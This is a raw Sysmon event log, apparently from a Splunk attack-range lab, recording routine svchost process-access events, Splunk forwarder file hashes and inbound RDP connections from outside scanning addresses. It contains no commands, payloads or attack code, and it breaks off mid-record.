14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:20.521{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:21.755{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A2E7484CCD6E69156FA5EC36D5DE087,SHA256=DB126AC525994FF483D3E871455338F9A82186978B0C54D0E750850F279B399B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048976Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:21.867{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5DD5D4B9B2CBD390B5C04B0AB15514A,SHA256=82D231A5E4D9018562FE3F30515E9AF82801FE1519B5731C1EC029380CAE637F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048975Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:21.429{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05B80247186ADCC8ABCC6757676F1136,SHA256=713F39B810F9ACDA57933CDB9C5807B9625179E823AB7E94A40EACF242159B99,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048974Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:18.751{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61171-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000048980Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:22.883{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8188D96590661FD6083C999227EFB16B,SHA256=7F3AC472D9CA74246ED8CD4512139ECF6BC24B1A89CD049B56BBB24B189F19E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:22.786{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC8014BF2520C94C638B4170675EDB7D,SHA256=768CBD0E105D6F56BC729A4A9EA7208DF1AC2B870FDAF68A52AE70B40E87394F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048979Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:22.539{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B64973A7FC0F9175505468337D93AF59,SHA256=62962CB5803F5E5F8C403FCC985DCD240F012BF23E9C27347E06471B4A6DEF8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048978Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:20.338{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62652-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000048977Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:19.398{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53703-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:23.802{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3030B44E70D1822FBE28F768B571177,SHA256=7F32CDECA1239B8990661512D9E3FD0BDD81728B7FDB55EF2C280A7535067EAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048985Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:23.883{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9049E9EA42ADEB5A3B70E581FF7D09B3,SHA256=714A8FD3BCE2FD7A36AAA69F267883CADE003661019B5595AB76F40BFAEF57B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048984Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:23.633{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048983Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:21.192{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55510-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000048982Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:21.004{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55198-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000048981Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:20.680{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52457-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000062657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:23.317{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4850BB8C6706463F17B3F12FCBBA790,SHA256=2CF1A63DDE86CBA19255B507222C2871A8AB8930F3DB4691FEEFFEEE899BE006,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:21.794{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55735-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:21.545{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-44749-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:21.298{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 